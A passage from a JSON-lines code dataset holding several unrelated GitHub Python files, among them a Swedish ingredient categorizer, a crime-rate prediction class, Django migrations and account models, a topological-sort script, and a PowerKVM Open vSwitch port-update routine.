\"brioche\"],\n \"DAIRY\": [\"mjölk\", \"ost\"],\n \"MEAT\": [\n \"kött\",\n \"kyckling\",\n \"fläsk\",\n \"korv\",\n \"sej\",\n \"lax\",\n \"räk\",\n \"torsk\",\n \"färs\",\n \"bacon\",\n ],\n \"UNKNOWN\": [\"sataysås\", \"buljong\", \"chili flakes\", \"mix\", \"honung\", \"dukkah\"],\n \"BASIC\": [\"*\"],\n \"CARBS\": [\n \"pasta\",\n \"ris\",\n \"nudlar\",\n \"spaghetti\",\n \"couscous\",\n \"penne\",\n \"bulgur\",\n \"lasagne\",\n \"quinoa\",\n \"mjöl\",\n \"pommes\",\n \"tagliatelle\",\n \"tortilla\",\n \"deg\",\n ],\n}\n\n\nclass ItemCategory(Enum):\n UNKNOWN = 99\n BASIC = 98\n BREAD = 2\n MEAT = 5\n DAIRY = 3\n GREEN = 1\n CARBS = 4\n\n def __str__(self):\n return categoryDescription[self.name]\n\n def __lt__(self, other):\n if self.__class__ is other.__class__:\n return self.value < other.value\n return NotImplemented\n\n\ndef categorize(ingredients):\n \"\"\"\n Adds an ItemCategory to every ingredient in the given list.\n \"\"\"\n for ing in ingredients:\n foundCategory = False\n for category in ItemCategory:\n if category.name not in categoryKeywords:\n continue\n for keyword in categoryKeywords[category.name]:\n if keyword in ing[\"name\"].lower():\n ing[\"category\"] = category\n foundCategory = True\n break\n if foundCategory:\n break\n if foundCategory is False:\n ing[\"category\"] = ItemCategory.UNKNOWN\n","repo_name":"jojelen/Der-kleine-helfer","sub_path":"helfer/classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27681312392","text":"from src.utils.logger import init_logger\n\nclass Predict():\n\n def __init__(self, df, model, **kwargs):\n \"\"\"[summary]\n\n Arguments:\n df {[type]} -- needs to have the following columns:\n [\"premisetype\", \"nbhd_id\", \"neighbourhood\",\n \"sq_metres\", \"crime_type\", \"occurrenceyear\"]\n model {function} -- w predict function that outputs a df \n including the following columns:\n [\"nbhd_id\", \"expected_crimes_per_hour\"]\n \"\"\"\n self.df = df\n self.logger = init_logger(\"predict_model\")\n self._get_nbhds()\n self.model = model\n self.check_df()\n\n def check_df(self):\n for col in [\"premisetype\", \"nbhd_id\", \"neighbourhood\",\n \"sq_metres\", \"crime_type\", \"occurrenceyear\"]:\n assert col in self.df.columns, f\"{col}\"\n\n def filter_df(self, premises, crimes, max_year, \n min_year, min_hour, max_hour,\n days_of_week):\n \"\"\"filter down the df for the viz\n\n Arguments:\n premises {list} -- [description]\n crimes {list} -- [description]\n max_year {int} -- max_year inclusive\n min_year {int} -- min_year inclusive\n \"\"\"\n self.logger.info(f\"shape before filtering: {self.df.shape}\")\n self.df_filtered = self.df[\n self.df.premisetype.astype(str).isin(premises)\n ]\n self.logger.info(f\"rows after filtering from premise: {self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n self.df_filtered.occurrenceyear <= max_year\n ]\n self.logger.info(f\"rows after filtering from premise, max_year: {self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n self.df_filtered.crime_type.isin(crimes)\n ]\n self.logger.info(f\"rows after filtering from premise, max_year and crime: {self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n self.df_filtered.occurrencehour < max_hour\n ]\n self.logger.info(f\"rows after filtering from max hour: {self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n [str(day).strip() in days_of_week \n for day in self.df_filtered.occurrencedayofweek.values]\n ]\n self.logger.info(f\"rows after filtering from max hour and dow: {self.df_filtered.shape[0]}\")\n self.df_filtered = self.df_filtered[\n self.df_filtered.occurrenceyear >= min_year\n ]\n self.df_filtered = self.df_filtered[\n self.df_filtered.occurrencehour >= min_hour\n ]\n self.logger.info(f\"rows after filtering from premise, min hour and min year: {self.df_filtered.shape[0]}\")\n self.hours_of_potential_crime = (\n 365 * \n (max_year - min_year + 1) * \n (len(days_of_week) / 7) * \n (max_hour - min_hour + 1)\n )\n self.logger.info(f\"shape after filtering: {self.df_filtered.shape}\")\n\n def get_predicted_cases_per_nbhd_per_hour(self):\n assert self.hours_of_potential_crime is not None, \"filter df first\"\n cases_per_nbhd = self.model.predict(\n self.df_filtered, self.hours_of_potential_crime\n )\n assert self.nbhd_df is not None, \"need to run self._get_nbhds first\"\n cases_for_all_nbhds = (\n self.nbhd_df\n .merge(cases_per_nbhd, on=\"nbhd_id\", how=\"left\")\n .fillna(0)\n )\n assert \"expected_crimes_per_hour\" in cases_for_all_nbhds.columns, \\\n \"missing required column from predict function on model\"\n return cases_for_all_nbhds\n\n def predict_cases_per_sq_km_per_nbhd_per_hour(self):\n cases_per_nbhd = self.get_predicted_cases_per_nbhd_per_hour()\n cases_w_sq_metres = cases_per_nbhd.merge(\n self.df_filtered[[\"nbhd_id\", \"sq_metres\", \"neighbourhood\"]].drop_duplicates(),\n on=[\"nbhd_id\"], how=\"left\"\n )\n assert cases_w_sq_metres.shape[0] == cases_per_nbhd.shape[0], \"join is off\"\n cases_w_sq_metres[\"Probability of Crime\"] = (\n cases_w_sq_metres.expected_crimes_per_hour\n / (cases_w_sq_metres.sq_metres * 1e-6)\n ) * 100\n self.logger.info(\"\\n\" + str(cases_w_sq_metres.describe()))\n return cases_w_sq_metres\n\n def predict_cases_per_10k_people_per_nbhd_per_hour(self):\n cases_per_nbhd = self.get_predicted_cases_per_nbhd_per_hour()\n cases_w_pop = cases_per_nbhd.merge(\n self.df_filtered[[\"nbhd_id\", \"population\", \"neighbourhood\"]].drop_duplicates(),\n on=[\"nbhd_id\"], how=\"left\"\n )\n assert cases_w_pop.shape[0] == cases_per_nbhd.shape[0], \"join is off\"\n cases_w_pop[\"Probability of Crime\"] = (\n cases_w_pop.expected_crimes_per_hour\n / (cases_w_pop.population / 10000)\n ) * 100\n self.logger.info(\"\\n\" + str(cases_w_pop.describe()))\n return cases_w_pop\n\n def get_num_crimes(self):\n crimes_per_nbhd = self.get_predicted_cases_per_nbhd_per_hour()\n crimes_per_nbhd.rename(columns={\"crimes_counts_per_nbhd\": \"Number of Crimes\"}, inplace=True)\n crimes_w_pop = crimes_per_nbhd.merge(\n self.df_filtered[[\"nbhd_id\", \"neighbourhood\"]].drop_duplicates(),\n on=[\"nbhd_id\"], how=\"left\"\n )\n return crimes_w_pop\n\n def _get_nbhds(self):\n self.nbhd_df = self.df[[\"nbhd_id\"]].drop_duplicates()\n ","repo_name":"parker84/torcrime","sub_path":"src/models/predict_model.py","file_name":"predict_model.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"16903133439","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('auth', '0006_require_contenttypes_0002'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Menu',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('texto', models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='MenuItem',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n ('texto', models.CharField(max_length=50)),\n ('clase', models.CharField(default='Entrada', max_length=2, choices=[('it', 'Entrada'), ('se', 'Sección'), ('en', 'encabezado')])),\n ('aprobacion', models.CharField(default='Autenticado', max_length=2, choices=[('au', 'Autenticado'), ('an', 'Anonimo'), ('', '')])),\n ('destino', models.CharField(default='/', max_length=256)),\n ('peso', models.SmallIntegerField()),\n ('padre', models.ForeignKey(on_delete=django.db.models.deletion.SET_NULL, to='menus.MenuItem', null=True, blank=True)),\n ('rol', models.ManyToManyField(blank=True, to='auth.Group')),\n ],\n options={\n 'ordering': ['padre', 'clase', 'peso'],\n 'get_latest_by': '-peso',\n },\n ),\n migrations.AddField(\n model_name='menu',\n name='items',\n field=models.ManyToManyField(blank=True, related_name='menus', to='menus.MenuItem'),\n ),\n migrations.AddField(\n model_name='menu',\n name='rol',\n field=models.ManyToManyField(blank=True, to='auth.Group'),\n ),\n migrations.AlterOrderWithRespectTo(\n name='menuitem',\n order_with_respect_to='padre',\n ),\n ]\n","repo_name":"sgjimenezv/Cyanocorax","sub_path":"cyanocorax/menus/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43177049463","text":"from sys import argv\n\nclass Vertex:\n def __init__(self, value):\n self.val = value\n self.neighbors = []\n\n def __add__(self, v):\n self.neighbors.append(v)\n \n def __repr__(self):\n ret = str(self.val) + ' : '\n ret += ', '.join(map\n (str, \n map(lambda x: x.val, self.neighbors)))\n return ret\n\nclass Graph:\n ''' Adjacency List'''\n def __init__(self, edges):\n self.nvertices = 0\n self.vertices = []\n added = {}\n for u, v in edges:\n if u not in added:\n tmp = Vertex(u)\n self.vertices.append(tmp)\n added[u] = tmp\n if v not in added:\n tmp = Vertex(v)\n self.vertices.append(tmp)\n added[v] = tmp\n added[u] + added[v]\n self.nvertices = len(self.vertices)\n\n def __repr__(self):\n ret = ''\n for v in self.vertices:\n ret += str(v) + '\\n'\n return ret\n\nvisited = set()\nwalk = []\n\ndef dfs_helper(g, v):\n global visited\n global walk\n visited.add(v)\n for n in v.neighbors:\n if n not in visited:\n dfs_helper(g, n)\n # add vertex to walk once we have finished \n # processing all it's neighbors\n walk.append(v.val)\n\ndef dfs(g):\n global visited\n global walk\n visited.clear()\n walk.clear()\n for v in g.vertices:\n if v not in visited:\n dfs_helper(g, v)\n # The vertices will finish processing in reverse order\n walk.reverse()\n return walk\n\ndef kahns(g):\n ''' Source removal algorithm '''\n # Holds the in-degree for each vertex\n counts = {}\n for v in g.vertices:\n counts[v] = 0\n for v in g.vertices:\n for n in v.neighbors:\n counts[n] += 1\n walk = []\n while len(walk) != g.nvertices:\n for v, c in counts.items():\n # A count of 0 means there are no incoming \n # edges so we have found a source\n if c == 0:\n walk.append(v.val)\n counts[v] = -1\n # Removing the source means we need to update the\n # counts of all the neighbors\n for n in v.neighbors:\n counts[n] -= 1\n break\n else:\n print(\"Toposort does not exist, graph is cyclic\")\n return []\n return walk\n\nif __name__ == '__main__':\n fname = argv[1]\n with open(fname, 'r') as f:\n edges = [line.strip().split(' ') for line in f]\n g = Graph(edges)\n print(\"Working Graph\")\n print(g)\n w = dfs(g)\n print('-' * 50)\n print(\"Toposort from DFS\")\n print(' '.join(walk))\n print('-' * 50)\n print('Toposort from source removal (kahns algorithm)')\n print(' '.join(kahns(g)))\n","repo_name":"jeff-lund/CS350","sub_path":"Toposort/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"22115950012","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"djangod\",\n version=\"0.0.1\",\n author=\"Yannick Hillion\",\n author_email=\"yk.hillion@gmail.com\",\n description=\"Django God packages\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/yannickHillion/djangod\",\n project_urls={\n \"Bug Tracker\": \"https://github.com/yannickHillion/djangod/issues\",\n },\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: Yannick Hillion\",\n \"Operating System :: OS Independent\",\n ],\n package_dir={\"\": \"src\"},\n packages=setuptools.find_packages(where=\"src\"),\n python_requires=\">=3.6\",\n)","repo_name":"YannickHillion/djangod","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3325049158","text":"#\n# =================================================================\n# =================================================================\n\nfrom nova import utils\nfrom nova.openstack.common import log as logging\nfrom powervc_nova.network.powerkvm.agent import commandlet\nfrom powervc_nova.network.powerkvm.agent import move_ip_address\nfrom powervc_nova.network.powerkvm.agent import multi_op\nfrom powervc_nova.network.powerkvm.agent import ifcfg_builder\nfrom powervc_nova.network.powerkvm.agent.common import micro_op\nfrom powervc_nova.network.powerkvm.agent.common import exception\nfrom powervc_nova.network.powerkvm.agent.common import warning\nfrom powervc_nova.network.powerkvm.agent.ovs_validation_mixin \\\n import OVSValidator\nfrom oslo.config import cfg\n\nCONF = cfg.CONF\nCONF.import_opt('integration_bridge', 'powervc_nova.network.powerkvm.agent')\n\nLOG = logging.getLogger(__name__)\n\n# These are used to track how far we have gotten into\n# the execution of the update and when will need to be\n# run is an undo is called\nOLD_PORT_DELETE = 1\nNEW_PORT_ADD = 2\nUNDO_ALL = 99\n\n\nclass OvsPortUpdate(micro_op.MicroOperation,\n OVSValidator):\n \"\"\"\n Update a port on an OpenVSwitch.\n \"\"\"\n\n def __init__(self, ovs_name, old_ovs_port_name, new_ovs_port_name,\n new_cmp_names):\n \"\"\"\n Constructor.\n\n :param ovs_name: The OpenVSwitch name that contains the port to update.\n :param old_ovs_port_name: The old name of the OVS Port to update\n :param new_ovs_port_name: The new name of the OVS Port to update\n :param new_cmp_names: A list of the new component names for the ovs\n port that is being updated\n \"\"\"\n self.ovs_name = ovs_name\n\n # Put this one in two places so the validator mixin finds it correctly\n self.ovs_port_name = old_ovs_port_name\n self.old_ovs_port_name = old_ovs_port_name\n\n self.new_ovs_port_name = new_ovs_port_name\n self.new_cmp_names = new_cmp_names\n self.commandex = commandlet.CommandExecutor()\n self.current_dom = None\n\n # need a way to determine where execute failed for undo purposes\n self.fail_location = UNDO_ALL\n\n # There are going to be several ifcfg file changes needed, so we build\n # a sub operations handler.\n self.sub_ops = multi_op.MultiMicroOp()\n\n def validate(self, curr_dom):\n \"\"\"\n Overrides parent method.\n\n Validate\n \"\"\"\n try:\n # Ensure the mixin has the correct DOM\n self.current_dom = curr_dom\n\n if self.current_dom is None:\n raise exception.IBMPowerKVMOVSNoValidDomSpecified\n\n \"\"\"\n NOTE: A failed check for any of the validation steps\n will result in an exception being raised and\n execution immediately returning to the caller.\n It is the caller's responsibility to process\n the exception appropriately\n \"\"\"\n\n # check if the ovs specified is the integration bridge\n self.validate_is_not_integration_bridge(self.ovs_name)\n\n # check for existence of specified ovs\n self.validate_ovs_exists(self.ovs_name)\n\n # check if old OVS port is assigned to the ovs\n self.validate_port_assigned(self.ovs_name, self.old_ovs_port_name)\n\n # check if new OVS port is already in use somewhere\n #self.validate_port_unassigned(self.old_ovs_port_name)\n\n # confirm at least one adapter in new port\n self.validate_adapter_list(self.new_cmp_names,\n self.old_ovs_port_name)\n\n # check if adapters for new port are available for use\n self.validate_adapters_available_update(self.new_cmp_names,\n self.old_ovs_port_name)\n\n self.validate_adapters_appear_once(self.new_cmp_names,\n self.ovs_port_name)\n\n except Exception as exp:\n LOG.error(exp)\n raise\n\n # Find the DOM's port object, to update\n ovs_dom = curr_dom.contains_vswitch_port_by_name(\n self.old_ovs_port_name)\n ovs_port = ovs_dom.get_port(self.old_ovs_port_name)\n ovs_port_names_to_add = []\n ovs_port_objs_to_remove = []\n ovs_port_objs_to_add = []\n for cmp_port in ovs_port.port_list:\n if cmp_port.name not in self.new_cmp_names:\n ovs_port_objs_to_remove.append(cmp_port)\n for cmp_port_name in self.new_cmp_names:\n has_port = False\n for cmp_port in ovs_port.port_list:\n if cmp_port.name == cmp_port_name:\n has_port = True\n break\n if not has_port:\n ovs_port_names_to_add.append(cmp_port_name)\n for port_name_to_add in ovs_port_names_to_add:\n obj = curr_dom.find_port_or_ovs(port_name_to_add)\n ovs_port_objs_to_add.append(obj)\n\n # Save off some 'original' data (or original by the time it hit here)\n self.orig_port_length = len(ovs_port.port_list)\n self.orig_cmp_names = []\n for comp in ovs_port.port_list:\n self.orig_cmp_names.append(comp.name)\n\n # Update the OVSPort to the new name\n ovs_port.name = self.new_ovs_port_name\n\n # If there will be multiple ports after this update, update ifcfg file\n # for an OVS port bond.\n is_bond = False\n if len(self.new_cmp_names) > 1:\n is_bond = True\n remove_on_undo = self.new_ovs_port_name != self.old_ovs_port_name\n op = ifcfg_builder.IfCfgBondFileBuilder(\n ovs_name=self.ovs_name,\n ovs_port_name=self.new_ovs_port_name,\n bond_cmp_names=self.new_cmp_names,\n remove_on_undo=remove_on_undo)\n self.sub_ops.micro_ops.append(op)\n\n # If we were coming from a single adapter, but are now multi\n # adapter, we need to update the original adapter to reflect this\n if len(self.orig_cmp_names) == 1:\n op = ifcfg_builder.IfcfgFileCmpBuilder(self.orig_cmp_names[0],\n ovs_name=self.ovs_name,\n is_bond=is_bond)\n self.sub_ops.micro_ops.append(op)\n\n # If there were originally multiple ports and there will still be\n # multiple ports, but the bond name is changing, delete the old\n # bond ifcfg file\n if len(self.orig_cmp_names) > 1 and len(self.new_cmp_names) > 1:\n if self.old_ovs_port_name != self.new_ovs_port_name:\n op = ifcfg_builder.IfCfgBondFileBuilder(\n ovs_name=self.ovs_name,\n ovs_port_name=self.old_ovs_port_name,\n bond_cmp_names=[]) # <- This empty list deletes ifcfg file\n self.sub_ops.micro_ops.append(op)\n\n # If there was originally multiple ports and there will be a single\n # port after this update, remove the ifcfg file.\n if len(self.orig_cmp_names) > 1 and len(self.new_cmp_names) == 1:\n is_bond = False\n op = ifcfg_builder.IfCfgBondFileBuilder(\n ovs_name=self.ovs_name,\n ovs_port_name=self.old_ovs_port_name,\n bond_cmp_names=[]) # <- This empty list deletes ifcfg file\n self.sub_ops.micro_ops.append(op)\n\n # We must also update the final components ifcfg file, if we\n # are coming from a bond and are no longer going to be a bond\n op = ifcfg_builder.IfcfgFileCmpBuilder(self.new_cmp_names[0],\n ovs_name=self.ovs_name,\n is_bond=is_bond)\n self.sub_ops.micro_ops.append(op)\n\n # We have detected which ports to add/remove. Now do the corresponding\n # updates to the DOM. The update guarantees us that there will be\n # at least one remaining port on the OVS Port (or else ovs_port_remove\n # would have been called.) Therefore, no IP Address movement is\n # needed for the removal scenario\n for port_remove in ovs_port_objs_to_remove:\n ovs_port.port_list.remove(port_remove)\n curr_dom.unused_component_list.append(port_remove)\n\n # We also need to check the ifcfg file of each removed port\n # to make sure we're not still referencing the parent bridge\n op = ifcfg_builder.IfcfgFileCmpBuilder(port_remove.name,\n ovs_name=None,\n is_bond=is_bond)\n self.sub_ops.micro_ops.append(op)\n\n # Now we loop to add in ports. However, we must check to see if a port\n # that is being added required a move of the IP Address.\n ip_adapter = None\n for port_add in ovs_port_objs_to_add:\n\n # Move the port in the DOM\n ovs_port.port_list.append(port_add)\n if port_add in curr_dom.unused_component_list:\n curr_dom.unused_component_list.remove(port_add)\n\n # Check the IP Addresses for moving\n if port_add.ip_addresses is not None and\\\n len(port_add.ip_addresses) > 0:\n # First check to make sure we do not have an IP Address on\n # the vSwitch already.\n if ovs_dom.ip_addresses is not None and\\\n len(ovs_dom.ip_addresses) > 0:\n raise exception.IPAddressAdd(dev=port_add.name,\n ovs_name=self.ovs_name)\n if ip_adapter is not None:\n ov = self.ovs_name\n raise exception.IPAddressAddMultiPort(dev=port_add.name,\n ovs_name=ov)\n\n # General validations complete...set the move of the IP Address\n op = move_ip_address.MoveIpAddress(port_add.name,\n self.ovs_name, is_bond)\n self.sub_ops.micro_ops.append(op)\n ip_adapter = port_add\n else:\n # The port may not have an IP Address, but we still need\n # to work against its ifcfg file.\n op = ifcfg_builder.IfcfgFileCmpBuilder(port_add.name,\n self.ovs_name,\n is_bond)\n self.sub_ops.micro_ops.append(op)\n\n # Save off the 'final' data\n self.final_port_length = len(ovs_port.port_list)\n self.final_cmp_names = []\n for comp in ovs_port.port_list:\n self.final_cmp_names.append(comp.name)\n\n # currently no warnings (just errors) returned by this micro op\n # However, the sub ops may have them so we'll just return those.\n return self.sub_ops.validate(self.current_dom)\n\n def execute(self):\n \"\"\"\n Overrides parent method.\n\n Execute\n \"\"\"\n try:\n # Remove old port\n LOG.debug('running ovs-vsctl del-port to remove old port')\n\n stdout, stderr = utils.execute('ovs-vsctl', 'del-port',\n self.ovs_name,\n self.old_ovs_port_name,\n run_as_root=True)\n if stderr and stderr != '':\n self.fail_location = OLD_PORT_DELETE\n raise exception.IBMPowerKVMCommandExecError(cmd='ovs-vsctl',\n exp=stderr)\n\n LOG.debug('ovs-vsctl del-port output = %s' % stdout)\n\n # Add new port\n if self.final_port_length == 1:\n LOG.debug('running ovs-vsctl add-port to add new port')\n # For just a single component, we use add-port.\n stdout, stderr = utils.execute('ovs-vsctl', 'add-port',\n self.ovs_name,\n self.final_cmp_names[0],\n run_as_root=True)\n LOG.debug('ovs-vsctl add-port output = %s' % stdout)\n\n elif self.final_port_length > 1:\n LOG.debug('running ovs-vsctl add-bond to add new port')\n # For multiple components, we use add-bond.\n stdout, stderr = utils.execute('ovs-vsctl', 'add-bond',\n self.ovs_name,\n self.new_ovs_port_name,\n *self.final_cmp_names,\n run_as_root=True)\n LOG.debug('ovs-vsctl add-bond output = %s' % stdout)\n\n if stderr and stderr != '':\n self.fail_location = NEW_PORT_ADD\n raise exception.IBMPowerKVMCommandExecError(cmd='ovs-vsctl',\n exp=stderr)\n\n # Finally run all the micro ops\n self.sub_ops.execute()\n\n # we've completed the full execute, so we need to indicate that,\n # if an undo is needed, we need to undo everything\n self.fail_location = UNDO_ALL\n except Exception as e:\n LOG.error(e)\n raise\n\n def undo(self):\n LOG.debug(\"Running undo of ovs port update execute\")\n\n try:\n # Start by undoing the micro ops\n self.sub_ops.undo()\n\n # Remove new port\n if self.fail_location >= NEW_PORT_ADD:\n LOG.debug('running ovs-vsctl del-port to remove new port')\n # The OVS port name should be the same as the component name.\n # The OVS port name is arbitrarily selected as the first\n # component in the list.\n stdout, stderr = utils.execute('ovs-vsctl', 'del-port',\n self.ovs_name,\n self.new_ovs_port_name,\n run_as_root=True)\n\n if stderr and stderr != '':\n raise exception.IBMPowerKVMCommandExecError(\n cmd='ovs-vsctl',\n exp=stderr)\n\n LOG.debug('ovs-vsctl del-port output = %s' % stdout)\n\n # Add old port\n if self.fail_location >= OLD_PORT_DELETE:\n if self.orig_port_length == 1:\n LOG.debug('running ovs-vsctl add-port to re-add old port')\n # For just a single component, we use add-port.\n stdout, stderr = utils.execute('ovs-vsctl', 'add-port',\n self.ovs_name,\n self.orig_cmp_names[0],\n run_as_root=True)\n LOG.debug('ovs-vsctl add-port output = %s' % stdout)\n\n elif self.orig_port_length > 1:\n LOG.debug('running ovs-vsctl add-bond to add new port')\n # For multiple components, we use add-bond.\n stdout, stderr = utils.execute('ovs-vsctl', 'add-bond',\n self.ovs_name,\n self.old_ovs_port_name,\n *self.orig_cmp_names,\n run_as_root=True)\n LOG.debug('ovs-vsctl add-bond output = %s' % stdout)\n\n if stderr and stderr != '':\n raise exception.IBMPowerKVMCommandExecError(\n cmd='ovs-vsctl',\n exp=stderr)\n\n except Exception as e:\n LOG.error(e)\n raise\n","repo_name":"windskyer/k_nova","sub_path":"paxes_nova/network/powerkvm/agent/ovs_port_update.py","file_name":"ovs_port_update.py","file_ext":"py","file_size_in_byte":16309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28380021128","text":"\nfrom django.contrib.auth.models import UserManager\nimport re\nfrom django.db import models\nfrom django.core import validators\nfrom django.contrib.auth.models import (AbstractBaseUser, PermissionsMixin)\nfrom django.db.models.signals import pre_save,post_migrate\nfrom django.dispatch import receiver\nfrom django.db import models, transaction \n\n\nclass Region(models.Model):\n\n REGIONES_CHOICES = [\n ('Metropolitana de Santiago', 'Metropolitana de Santiago'),\n ('Tarapacá', 'Tarapacá'),\n ('Antofagasta', 'Antofagasta'),\n ('Atacama', 'Atacama'),\n ('Coquimbo', 'Coquimbo'),\n ('Valparaíso', 'Valparaíso'),\n ('Libertador General Bernardo O\\'Higgins', 'Libertador General Bernardo O\\'Higgins'),\n ('Maule', 'Maule'),\n ('Ñuble', 'Ñuble'),\n ('Biobío', 'Biobío'),\n ('La Araucanía', 'La Araucanía'),\n ('Los Ríos', 'Los Ríos'),\n ('Los Lagos', 'Los Lagos'),\n ('Aysén del General Carlos Ibáñez del Campo', 'Aysén del General Carlos Ibáñez del Campo'),\n ('Magallanes y de la Antártica Chilena', 'Magallanes y de la Antártica Chilena'),\n ]\n nombre = models.CharField(max_length=50, choices=REGIONES_CHOICES)\n def __str__(self):\n return self.nombre\n\n\n@receiver(post_migrate)\ndef create_regions(sender, **kwargs):\n if sender.name == 'accounts': \n existing_regions = set(Region.objects.values_list('nombre', flat=True))\n for region_choice in Region.REGIONES_CHOICES:\n region_name = region_choice[0]\n if region_name not in existing_regions:\n Region.objects.create(nombre=region_name)\n existing_regions.add(region_name)\n\n\nclass ComplejoDeportivo(models.Model):\n nombre = models.CharField(max_length=100)\n region = models.ForeignKey(Region, on_delete=models.CASCADE, default='Metropolitana de Santiago')\n url = models.URLField()\n imagen = models.ImageField(upload_to='static/complejos_deportivos/')\n \n def __str__(self):\n return self.nombre\n\n\nclass Permiso(models.Model):\n CLASES_CHOICES = [\n ('Permiso', 'Permiso'),\n ('Rol', 'Rol'),\n ('User', 'User'),\n ('Cliente', 'Cliente'),\n ('Reserva', 'Reserva'),\n ('Ticket', 'Ticket'),\n ('Boleta', 'Boleta'),\n ('TipoCancha', 'TipoCancha'),\n ('Cancha', 'Cancha'),\n ('Horario', 'Horario'),\n ('Agenda', 'Agenda'),\n ]\n clase = models.CharField(max_length=15, choices=CLASES_CHOICES)\n nombre = models.CharField(max_length=50)\n\n class Meta:\n unique_together = ('clase', 'nombre') \n\n def __str__(self):\n return self.nombre\n\n#ESTE TIPO DE FUNCIONES ES PARA CUANDO SE HAGA EL MIGRATE RELLENAR AUTOMATICO CON PERMISOS POR DEFECTO\n@receiver(post_migrate)\ndef create_default_permissions(sender, **kwargs):\n if sender.name == 'accounts':\n with transaction.atomic():\n for choice_value, choice_display in Permiso.CLASES_CHOICES:\n for perm_action in ['crear', 'leer', 'actualizar', 'eliminar']:\n perm_name = f'{perm_action} {choice_display.lower()}'\n permiso, _ = Permiso.objects.get_or_create(\n clase=choice_value,\n nombre=perm_name\n )\n\n\nclass Rol(models.Model):\n ROL_CHOICES = [\n ('admin', 'Administrador'),\n ('trabajador', 'Trabajador'),\n ('cliente', 'Cliente'),\n ]\n\n nombre = models.CharField(max_length=15, unique=True, choices=ROL_CHOICES)\n permisos = models.ManyToManyField(Permiso)\n\n def __str__(self):\n return self.get_nombre_display()\n\n class Meta:\n verbose_name_plural = 'roles'\n\n\nclass CustomUserManager(UserManager):\n def create_superuser(self, username, email=None, password=None, **extra_fields):\n extra_fields.setdefault('is_staff', True)\n extra_fields.setdefault('is_superuser', True)\n\n if extra_fields.get('is_staff') is not True:\n raise ValueError('Superuser must have is_staff=True.')\n if extra_fields.get('is_superuser') is not True:\n raise ValueError('Superuser must have is_superuser=True.')\n\n admin_role, created = Rol.objects.get_or_create(nombre='admin')\n extra_fields['roles'] = admin_role\n\n return self._create_user(username, email, password, **extra_fields)\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n id = models.AutoField(primary_key=True, unique=True)\n username = models.CharField(\n 'Usuario', max_length=30, unique=True, validators=[\n validators.RegexValidator(\n re.compile('^[\\w.@+-]+$'),\n 'ingrese un nombre de usuario valido '\n 'Este valor debe contener solo letras, números '\n 'excepto: @/./+/-/_.',\n 'invalid'\n )\n ],\n help_text='Un nombre corto que sera usado'+\n ' para identificarlo de forma unica en la plataforma.'\n )\n name = models.CharField('Nombre', max_length=20)\n apellidos = models.CharField('Apellidos', max_length=30)\n email = models.EmailField('Email', unique=True)\n is_staff = models.BooleanField('Admin', default=False)\n is_active = models.BooleanField('Ativo', default=True)\n date_joined = models.DateTimeField('Data de Entrada', auto_now_add=True)\n roles = models.ForeignKey(Rol, on_delete=models.CASCADE)\n\n USERNAME_FIELD = 'username'\n REQUIRED_FIELDS = ['email']\n\n objects = CustomUserManager()\n\n class Meta:\n verbose_name = 'Usuario'\n verbose_name_plural = 'Usuarios'\n\n def __str__(self):\n return self.name or self.username\n\n def get_full_name(self):\n return str(self)\n\n def get_short_name(self):\n return str(self).split(' ')[0]\n\n\n#ESTA FUNCION HACE QUE CUANDO SE GUARDE UN USUARIO ESTE TENGA EL ROL POR DEFECTO DE CLIENTE\n@receiver(pre_save, sender=User)\ndef assign_default_role(sender, instance, **kwargs):\n if not instance.roles:\n default_role, created = Rol.objects.get_or_create(nombre='cliente')\n instance.roles = default_role\n\n#ESTA FUNCION HACE QUE SI EL USUARIO CAMBIA SU ROL A ADMINISTRADOR SEA LO MISMO QUE UN SUPER USUARIO\n@receiver(pre_save, sender=User)\ndef update_is_staff(sender, instance, **kwargs):\n if instance.roles and instance.roles.nombre == 'admin':\n instance.is_staff = True\n else:\n instance.is_staff = False\n\n\n","repo_name":"arizonv/Api-Portafolio","sub_path":"accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6412,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"38976401879","text":"# Tests for compare_to_database.py\n\nfrom Code.compare_to_database import CompareToDatabase\nfrom Code.peak import Peak\nfrom unittest import mock\n\n@mock.patch.object(CompareToDatabase, \"_match_xrd\")\ndef test_match_xrd(mock):\n\tCompareToDatabase(\"xrd\").match()\n\tmock.assert_called()\n\n@mock.patch.object(CompareToDatabase, \"_match_ftir\")\ndef 